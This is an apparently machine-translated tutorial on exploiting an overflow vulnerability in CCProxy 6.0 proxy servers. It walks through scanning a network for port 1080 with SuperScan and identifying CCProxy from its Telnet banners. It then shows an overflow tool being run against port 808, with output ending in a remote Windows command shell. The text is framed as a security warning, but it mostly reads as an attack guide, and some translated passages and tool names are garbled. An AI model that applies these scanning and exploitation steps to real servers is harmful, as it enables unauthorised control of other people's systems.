A conspiracy hidden in the CCProxy agent software

The proxy server solves many problems for everyone, such as blocking hacker attacks and sharing the Internet over the LAN. In this article, we will discuss a vulnerability on the proxy server. I hope you will pay attention to it. To reveal this hidden "conspiracy" and let us know whether our proxy server has this vulnerability, We will simulate hacker attacks against this vulnerability, so that you can take appropriate security measures.

I. Agent software vulnerabilities

CCProxy has become the most popular proxy server software in China due to its ease of configuration and ease of use. It not only supports common HTTP and socks proxies, but also supports FTP and telnet agents that are not commonly used. It can also control the proxy's access permissions and set the user name and password for accessing the proxy server, which is very powerful.

This outstanding proxy software has recently exposed an overflow vulnerability that allows attackers to directly gain control over the proxy server. The CCProxy version involved in this vulnerability is currently very popular version 6.0, and all previous versions.

Software Materials
Software name: CCProxy
Software Version: 6.0
Authorization method: Shared Software
Software size: 820kb
: Http://www2.skycn.com/soft/1058.html

2. Test the CCProxy Server

To use the preceding vulnerabilities to control proxy servers, you must first determine whether the target proxy server is installed with CCProxy (figure 1 ).

Figure 1 CCProxy supports multiple Protocol proxies

Because the socks proxy service port of All proxy server software is "1080" by default, we can use it to find the proxy server and then confirm whether the server has CCProxy installed. After testing, the following detection methods are found to be more practical and reliable.

1. Scan

Use the port scanner superscan to scan for hosts with port 1080 enabled in the specified network segment. Open superscan and set the scan port range to "1080 ~" in the "all ports from" column ~ 1080 ", and then fill in the IP address segment to be scanned within the target IP address range. Click the start button to scan. Soon, you will find all hosts with port 1080 enabled in the IP address segment of the scan (figure 2 ). Select a host to check whether the CCProxy proxy is installed.

Figure 2 hosts with opened ports are marked with green hooks

2. Probe

By default, CCProxy uses "23" as the proxy port of the Telnet service and "2121" as the proxy port of the FTP service. We only need to perform information detection on these ports to find whether the target host is a CCProxy server.

Open the CMD command line window and use Telnet to connect to the target host. The command format is:
Telnet Destination IP port (for example, "Telnet 127.0.0.1 23 ")

If the target proxy server is in the password-free state of CCProxy (that is, the proxy username and password have not been set), the "CCProxy Telnet Server Ready" message appears "; if the target proxy server is in the CCProxy password status (that is, the proxy username and password have been set ), the user name will be prompted (the error message "User invalid" will be displayed after a few characters are entered "). This information is unique to the CCProxy agent software, so that you can easily determine whether CCProxy is installed on the target Proxy Server (Figure 3 ).

Figure 3 two running Modes of CCProxy

Iii. Attack the CCProxy Server

The above method is used to confirm that the target is the proxy server with CCProxy installed, then the following will begin to use the CCProxy overflow attack tool for overflow. Ccpx.exe "is an overflow attack tool that downloads ccproxyfrom the internet ". Open it in the CMD command line and you can see the HELP command:
Usage: ccproxyexp.exe [target_port]

"Target_ip" indicates the IP address of the target host, and "target_port" indicates the master port of CCProxy. The default value is "808 ".
Enter the attack command according to the parameter and prompt:
Is the Host IP address in the same network segment as the target host IP address? [Y/n] y
[+] Connection to 127.0.0.1: 808
[+] Send magic buffer...
[+] Connecting to cmd shell port...
Microsoft Windows 2000 [version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C: \ winnt \ System32
The overflow is successful, and the control of the proxy server is obtained (figure 4 ).

Figure 4 server control is successfully obtained after Overflow